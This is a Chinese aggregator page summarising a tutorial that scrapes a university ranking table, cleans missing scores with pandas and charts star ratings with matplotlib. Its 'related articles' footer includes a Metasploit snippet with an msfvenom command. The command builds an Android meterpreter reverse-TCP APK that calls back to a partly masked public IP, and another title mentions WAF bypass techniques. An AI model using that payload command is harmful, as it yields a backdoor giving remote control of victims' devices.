爬虫与数据分析结和

  1. 任务描述
    • 爬取目标:高三网中国大学排名一览表,网址为 2021中国的大学排名一览表_高三网。
    • 爬取内容:学校名称、总分、全国排名、星级排名、办学层级。
    • 数据存储:爬取后的数据保存在 CSV 文件中。
  2. 代码实现(爬取)
    • 导入库:requests、BeautifulSoup、csv。
    • 关键函数:
      • get_html(url, time=3):发送 get 请求获取网页文本内容,设置编码和异常处理。
      • parser(html):将 html 转换为 soup 对象,遍历表格行提取数据并整理成列表。
      • save_csv(item, path):将列表数据写入 CSV 文件。
    • 主程序:获取网页数据、解析数据、存储数据到 school.csv。
  3. 运行结果(爬取)
    • 生成 school.csv 文件,包含多所大学的排名信息,例如北京大学(总分 100、全国排名 1 等)、清华大学(总分 99.81、全国排名 2 等)。
  4. 数据预处理
    • 问题:school.csv 中 “总分” 列存在空数据。
    • 处理方法:
      处理方式具体操作
      删除包含空字段的行使用pd.read_csv读取文件,通过df.dropna()删除空行
      用指定内容替换空字段使用df.fillna("暂无分数信息",inplace = True)替换
      计算列的均值替换空单元格计算 “总分” 列均值,用df["总分"].fillna(x, inplace=True)替换
      计算列的中位数替换空单元格计算 “总分” 列中位数,用df["总分"].fillna(x, inplace=True)替换
  5. 数据分析
    • 数据规模:该网站共有 820 所学校。
    • 星级分布:8 星学校有 8 所,7 星学校有 16 所,6 星学校有 36 所,5 星学校有 59 所,4 星学校有 103 所,3 星学校有 190 所,2 星学校有 148 所,1 星学校有 260 所。
    • 占比情况:8 星约占 1%,7 星约占 2%,6 星约占 4.5%,5 星约占 7.2%,4 星约占 12.5%,3 星约占 23.1%,2 星约占 18%,1 星约占 31.7%。
  6. 数据可视化
    • 柱形图:使用 matplotlib 绘制,展示不同星级学校的个数,有垂直和水平两种形式。
    • 饼图:使用 matplotlib 绘制,展示不同星级学校个数的占比情况。

关键问题

  1. 问题:在爬取中国大学排名数据时,使用了哪些库及各自的作用?
    答案:使用了 requests 库,用于发送 HTTP 请求获取网页内容;BeautifulSoup 库,用于解析网页 HTML 结构,提取所需数据;csv 库,用于将提取的数据写入 CSV 文件进行存储。
  2. 问题:对 school.csv 中 “总分” 列的空数据,有哪些处理方法?
    答案:有四种处理方法,分别是删除包含空字段的行,使用df.dropna()实现;用指定内容(如 “暂无分数信息”)替换空字段,通过df.fillna()实现;计算列的均值替换空单元格,先算均值再用fillna替换;计算列的中位数替换空单元格,先算中位数再用fillna替换。
  3. 问题:在对中国大学星级分布进行可视化时,使用了哪些图表及各自的作用?
    答案:使用了柱形图和饼图。柱形图直观展示了不同星级学校的具体数量,能清晰对比各星级学校数量的多少;饼图则展示了不同星级学校个数在总学校数中的占比情况,便于了解各星级学校的分布比例。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/92738.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/92738.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

linux下安装php

1.php官网下载所需要的php版本 下载php 2.将下载好的压缩包上传至linux服务器,解压并配置 tar -xzvf php-8.4.11.tar.gz cd php-8.4.11 ./configure --prefix/home/admintest/php/php-8.4.11 # 配置安装路径和选项 make sudo make install3.使用make命令编译完成…

nurbs曲线的matlab

基于MATLAB的NURBS曲线生成与可视化程序 %% NURBS曲线生成与可视化 clc; clear; close all;%% 基本参数设置 degree 3; % 曲线阶数 (degree k-1, k为控制点数) numCtrlPts 6; % 控制点数量 weights ones(1, numCtrlPts); % 权重向量(可调整&#…

AWS WAF防护机制深度研究:多模式验证与绕过技术解析

AWS WAF防护机制深度研究:多模式验证与绕过技术解析 技术概述 AWS WAF(Web Application Firewall)作为亚马逊云服务的核心安全组件,为Web应用提供了多层次的防护机制。该系统基于先进的机器学习算法和规则引擎,能够实…

嵌入式 - Linux软件编程:文件IO

一、概念标准IO是有缓存的IO,文件IO没有缓存,适合于通信、硬件设备操作标准IO是库函数,文件IO是系统调用文件 IO 与标准 IO(基于 C 库函数的 IO)是 Linux 中两种主要的 IO 方式,二者的核心差异如下&#xf…

ESP32 MQTT对接EMQX本地服务器

文章目录一、搭建EMQX本地MQTT服务器1.1 下载1.2 使用二、MQTT.fx安装使用2.1 破解及安装2.2 客户端界面说明2.3 与 WebSocket 客户端互发消息2.3.1 使用MQTT.fx连接到EMQX本地服务器1.General设置2.User Credentials设置3.进行连接2.3.2 MQTT.fx发布和订阅主题1.发布主题2.订阅…

【Node.js从 0 到 1:入门实战与项目驱动】2.2 验证安装(`node -v`、`npm -v`命令使用)

文章目录 第 2 章:环境搭建 —— 准备你的开发工具 2.2 验证安装(`node -v`、`npm -v`命令使用) 一、基础验证命令解析 二、基础验证场景案例 案例 1:首次安装后的基础验证 案例 2:检查版本兼容性 三、进阶场景案例 案例 3:在脚本中动态获取 Node.js 版本 案例 4:在 npm…

【虚拟机】VMwareWorkstation17Pro安装步骤

哈喽,你好啊,我是雷工! 工作中时常会遇到各种各样的系统, 需要做各种测试, 比如要验证某个软件在某个系统版本上是否适配, 这时候将自己的电脑系统换成要测试的系统就会比较麻烦。 这时候使用虚拟机就…

C语言库中的字符函数

目录 求字符串长度 认识strlen 自主实现strlen 字符串拷贝 认识strcpy 自主实现strcpy strncpy 字符串拼接 认识strcat 自主实现sracat strncat 字符串大小比较 认识strcmp 自主实现strcmp strncmp 字符串中寻找子字符串 认识strstr 自主实现strstr 根据符号…

学习日志31 python

1 x, y y, x 是合法的,这是Python的特色语法x, y y, x 是 Python 中一种非常简洁且实用的特色语法,用于交换两个变量的值。这种语法的优势在于:无需额外的临时变量即可完成交换操作代码简洁易读,一眼就能理解其目的执行效率高,在…

Mac配置服务器工具Royal TSX

Royal TSX是mac上类似xshell的工具,可以远程连接服务器、连接ftp等 下载Royal TSX 官网:Royal TSX 下载插件 在设置中的插件市场plugins中下载需要的插件 例如 远程shell插件:Terminal ftp插件:File Transfer 新建一个文档 开…

【小程序】微信小程序开发,给用户发送一次性订阅消息,常见参数长度和数据类型说明,你值得收藏

🌹欢迎来到《小5讲堂》🌹 🌹这是《小程序》系列文章,每篇文章将以博主理解的角度展开讲解。🌹 🌹温馨提示:博主能力有限,理解水平有限,若有不对之处望指正!&a…

Pytorch深度学习框架实战教程-番外篇05-Pytorch全连接层概念定义、工作原理和作用

相关文章 视频教程 《Pytorch深度学习框架实战教程01》《视频教程》 《Pytorch深度学习框架实战教程02:开发环境部署》《视频教程》 《Pytorch深度学习框架实战教程03:Tensor 的创建、属性、操作与转换详解》《视频教程》 《Pytorch深度学习框架实战…

生产环境中Spring Cloud Config高可用与动态刷新实战经验分享

生产环境中Spring Cloud Config高可用与动态刷新实战经验分享 一、业务场景描述 在微服务架构中,配置中心承担集中化管理各微服务配置的职责。随着服务实例数量增加,单点部署的Spring Cloud Config Server无法满足生产环境的高可用需求。同时&#xff0c…

华为服务器中Mindie镜像的部署及启动方法

一、部署方法 首先要安装好Docker,然后点开网址https://www.hiascend.com/developer/ascendhub/detail/af85b724a7e5469ebd7ea13c3439d48f 拉取镜像需要申请权限: 注册登录后,即可提交申请,一般需要一个工作日,等审核通过后,点击下载即可弹出如下提示框: 按照上述方法…

Unity基于Recoder的API写了一个随时录屏的工具

Tips: 需要有Recorder Package引用或存在在项目 using UnityEngine; using UnityEditor; using UnityEditor.Recorder; using UnityEditor.Recorder.Input; using System.IO; using System;public class RecorderWindow : EditorWindow {private RecorderController recorderCo…

安卓渗透基础(Metasploit)

生成payloadmsfvenom -p android/meterpreter/reverse_tcp LHOST106.53.xx.xx LPORT8080 -o C:\my_custom_shell.apkapksigner 是 Android SDK 中的一个工具,用于给 APK 文件签名,确保应用的完整性和安全性。进入 File > Settings > Appearance &a…

从零构建自定义Spring Boot Starter:打造你的专属开箱即用组件

一、引言:为什么需要自定义Spring Boot Starter Spring Boot的核心理念是"约定优于配置",而Starter(启动器)正是这一理念的最佳实践。官方提供的Starter(如spring-boot-starter-web、spring-boot-starter-data-jpa)通过封装常用组件的配置,让开发者能够"…

MySQL 基础操作教程

MySQL 是目前最流行的开源关系型数据库管理系统之一,广泛应用于Web开发、数据分析等场景。掌握基础的增删改查操作是入门的关键。本文将从环境准备开始,带你深入,mysql一、前置准备:安装与连接 MySQL 1. 安装 MySQL Windows&#…

批量把在线网络JSON文件(URL)转换成Excel工具 JSON to Excel by WTSolutions

产品介绍 JSON to Excel by WTSolutions 是一款功能强大的工具,能够将JSON数据快速转换为Excel格式。该工具提供两种使用方式:作为Microsoft Excel插件或作为在线网页应用,满足不同用户的需求。无论是处理简单的扁平JSON还是复杂的嵌套JSON结…

【排序算法】③直接选择排序

系列文章目录 第一篇:【排序算法】①直接插入排序-CSDN博客 第二篇:【排序算法】②希尔排序-CSDN博客 第三篇:【排序算法】③直接选择排序-CSDN博客 第四篇:【排序算法】④堆排序-CSDN博客 第五篇:【排序算法】⑤冒…